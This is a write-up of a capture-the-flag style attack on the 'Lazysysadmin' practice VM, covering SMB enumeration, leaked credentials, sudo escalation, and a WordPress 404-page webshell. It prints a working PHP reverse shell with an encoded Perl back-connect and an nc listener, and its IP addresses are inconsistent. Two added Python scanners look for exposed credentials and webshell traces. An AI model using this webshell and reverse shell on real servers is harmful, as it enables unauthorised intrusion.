Lazysysadmin target VM
Posted by bingtang123
For personal entertainment only.
VM information
Lazysysadmin VM, Baidu cloud download link: https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ (extraction code: q6zo)
Information gathering
Full-port nmap scan
nmap -sS -Pn -A -p- -n 192.168.181.192
Whatever else turns up, port 6667 must not be let slip. I remembered that in the Metasploitable2 hands-on, UnrealIRCd IRC was running on port 6667 and msf took it down straight away; it did not work this time, but stay alert.
SMB enumeration
Ports 139 and 445 are open, and these are the high-risk share ports (I run Linux file sharing myself). First use enum4linux -S to enumerate the target's shares:
enum4linux -S 192.168.181.129
It directly revealed the following shares:
Directory brute-forcing with dir
On the WordPress home page I found "My name is togie.", so the login username is probably togie.
Enumerate the WordPress username:
http://192.168.181.129/wordpress/?author=1
Exploitation
Access the share with smbclient
smbclient //192.168.181.129/share$
On Windows, just enter \\192.168.181.129\share$
To take over a WordPress site, head straight for wp-config.php.
Login account / password: Admin / TogieMYSQL12345^^
Two important txt files were found in the share$ directory: todolist.txt and deets.txt
In deets.txt:
CBF Remembering all these passwords.
Remember to remove this file and update your password after we push out the server.
Password 12345
In todolist.txt:
Prevent users from being able to view to web root using the local file browser
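The two findings above (a "Password 12345" note left in a text file and wp-config.php reachable through the share) are exactly what an audit of an exported directory should catch before the share goes live. The following is an added example, not code from the post: a small Python scanner that walks a share's directory tree and reports lines that look like plaintext credentials. The patterns, the file-type list and the constructed sample tree (including the placeholder DB password) are my assumptions; point `scan_share` at the real share path (for example the Samba share's `path` or a mounted copy) to run it for real.

```python
import os
import re
import tempfile

# Two kinds of plaintext credential seen on the share in the post:
# a "Password 12345"-style note, and WordPress's DB_PASSWORD define.
CREDENTIAL_PATTERNS = [
    # "password" followed by ':'/'=' and a value, or by a token containing a digit
    re.compile(r"\bpassword\b(?:\s*[:=]\s*\S+|\s+\S*\d\S*)", re.IGNORECASE),
    re.compile(r"define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"][^'\"]*['\"]\s*\)",
               re.IGNORECASE),
]

# Only look inside file types that are plausibly text; extensionless files included.
TEXT_EXTENSIONS = {"", ".txt", ".php", ".conf", ".cfg", ".ini", ".md"}


def scan_file(path):
    """Return the 1-based line numbers in `path` that match a credential pattern."""
    hits = []
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                if any(p.search(line) for p in CREDENTIAL_PATTERNS):
                    hits.append(lineno)
    except OSError:
        pass  # unreadable file: skip it rather than abort the audit
    return hits


def scan_share(root):
    """Walk a share's tree and map 'relative/path' -> list of offending line numbers."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in TEXT_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings[rel] = hits
    return findings


def build_sample_share():
    """Constructed sample tree mirroring the files the post found on share$.
    The DB password written here is a placeholder, not the value from the post."""
    root = tempfile.mkdtemp(prefix="share_audit_")
    os.makedirs(os.path.join(root, "wordpress"))
    with open(os.path.join(root, "deets.txt"), "w") as fh:
        fh.write("CBF Remembering all these passwords.\n"
                 "Remember to remove this file and update your password after we push out the server.\n"
                 "Password 12345\n")
    with open(os.path.join(root, "todolist.txt"), "w") as fh:
        fh.write("Prevent users from being able to view to web root using the local file browser\n")
    with open(os.path.join(root, "wordpress", "wp-config.php"), "w") as fh:
        fh.write("<?php\n"
                 "define('DB_NAME', 'wordpress');\n"
                 "define('DB_USER', 'Admin');\n"
                 "define('DB_PASSWORD', 'PLACEHOLDER_DB_PASSWORD');\n")
    return root


if __name__ == "__main__":
    share_root = build_sample_share()  # in practice: the share's real path
    for rel_path, lines in sorted(scan_share(share_root).items()):
        print(f"{rel_path}: plaintext credential on line(s) {lines}")
```

On the constructed tree the scanner flags line 3 of deets.txt and the DB_PASSWORD line of wordpress/wp-config.php, while the "update your password after" sentence and todolist.txt produce no hit; the digit requirement in the first pattern is what keeps ordinary prose mentioning passwords out of the report.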
Method 1: privilege escalation via SSH login
Presumably the server login password is 12345 and the user is togie.
We can see that sudo su works directly, so privileges are escalated.
Go to the root directory and get the flag.
Method 2: privilege escalation via webshell
In wp-config.php, the account and password are: Admin / TogieMYSQL12345^^
Log in to the WordPress site and edit the 404 page under Appearance > Editor; you can plant a small webshell and connect with China Chopper, or bounce a reverse shell straight to Kali: 192.168.181.129
PHP reverse shell script:
<?php
// Resolve a binary's full path with `which`, falling back to the bare name.
function which($pr) {
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}

// Run a command through whichever execution function PHP has not disabled.
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join(" ", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = '';
            while (!@feof($f)) {
                $res .= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}

// Write the base64-decoded payload to a file.
function cf($fname, $text) {
    if ($fp = @fopen($fname, 'w')) {
        @fputs($fp, @base64_decode($text));
        @fclose($fp);
    }
}

$yourip = "192.168.181.129";
$yourport = '4444';
$usedb = array('perl' => 'perl', 'c' => 'c');
// base64-encoded Perl back-connect script
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj"
    . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR"
    . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT"
    . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI"
    . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi"
    . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl"
    . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

cf('/tmp/.bc', $back_connect);
$res = execute(which('perl') . " /tmp/.bc $yourip $yourport &");
?>
Listen on Kali:
nc -lvp 4444
Trigger the reverse shell:
http://192.168.8.130/wordpress/wp-content/themes//twentyfifteen/404.php
Use a Python one-liner to switch to /bin/bash:
python -c 'import pty;pty.spawn("/bin/bash")'
There is no way around it here: we still have to use the password from deets.txt (12345) with the username togie hinted on the WordPress home page, and escalate with sudo.
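From the defender's side, the webshell route above has two chokepoints: the theme editor that let the 404 page be rewritten, and the staging pattern in the payload itself (a command-execution function, `base64_decode` of a long literal, and a file dropped under /tmp). The following is an added example, not code from the post: a Python scanner that walks `wp-content/themes`, reports PHP files carrying those indicators, and checks whether wp-config.php disables the built-in editor with the real WordPress constant `DISALLOW_FILE_EDIT`. The indicator patterns and the constructed sample theme directory (with a dummy base64 blob and a harmless `exec('true')`) are my assumptions.

```python
import os
import re
import tempfile

# PHP functions the 404.php backdoor in the post chains through to run commands.
EXEC_FUNCS = ("exec", "shell_exec", "system", "passthru", "popen", "proc_open")
EXEC_RE = re.compile(r"\b(?:" + "|".join(EXEC_FUNCS) + r")\s*\(", re.IGNORECASE)
# Payload staging: base64_decode() of a long literal, then a file dropped under /tmp.
B64_CALL_RE = re.compile(r"\bbase64_decode\s*\(", re.IGNORECASE)
B64_BLOB_RE = re.compile(r"['\"][A-Za-z0-9+/]{40,}={0,2}['\"]")
TMP_WRITE_RE = re.compile(r"\bfopen\s*\(\s*['\"]/tmp/", re.IGNORECASE)

INDICATORS = [
    ("command-execution function", EXEC_RE),
    ("base64_decode call", B64_CALL_RE),
    ("long base64 literal", B64_BLOB_RE),
    ("file written under /tmp", TMP_WRITE_RE),
]


def php_indicators(source):
    """Return the names of every webshell indicator present in a PHP source string."""
    return [name for name, pattern in INDICATORS if pattern.search(source)]


def scan_themes(themes_root):
    """Map each .php file under the themes directory ('/'-separated relative path)
    to its indicators; files with no indicators are omitted."""
    suspicious = {}
    for dirpath, _, files in os.walk(themes_root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                hits = php_indicators(fh.read())
            if hits:
                suspicious[os.path.relpath(full, themes_root).replace(os.sep, "/")] = hits
    return suspicious


def file_editor_disabled(wp_config_source):
    """True if wp-config.php sets DISALLOW_FILE_EDIT to true, which removes the
    Appearance > Editor page used in the post to rewrite 404.php."""
    pattern = r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)"
    return re.search(pattern, wp_config_source, re.IGNORECASE) is not None


def build_sample_themes():
    """Constructed themes directory: one untouched 404.php and one carrying the
    same staging shape as the post's payload, with a dummy blob and a no-op command."""
    root = tempfile.mkdtemp(prefix="themes_audit_")
    clean = os.path.join(root, "twentyfifteen")
    tampered = os.path.join(root, "tampered")
    os.makedirs(clean)
    os.makedirs(tampered)
    with open(os.path.join(clean, "404.php"), "w") as fh:
        fh.write("<?php get_header(); ?>\n<h1>Page not found</h1>\n<?php get_footer(); ?>\n")
    with open(os.path.join(tampered, "404.php"), "w") as fh:
        fh.write("<?php\n"
                 "$blob = '" + "A" * 48 + "';\n"
                 "if ($fp = @fopen('/tmp/.bc', 'w')) { fputs($fp, base64_decode($blob)); fclose($fp); }\n"
                 "@exec('true', $out);\n")
    return root


if __name__ == "__main__":
    themes = build_sample_themes()  # in practice: /path/to/wordpress/wp-content/themes
    for rel, hits in sorted(scan_themes(themes).items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run against a real install, the scan should be paired with a file-integrity baseline of the theme directory, since a legitimate theme can contain one of these indicators in isolation; all four together in a 404 template is the pattern worth paging on. Adding `define('DISALLOW_FILE_EDIT', true);` to wp-config.php closes the editor route even when an admin password has leaked through a share.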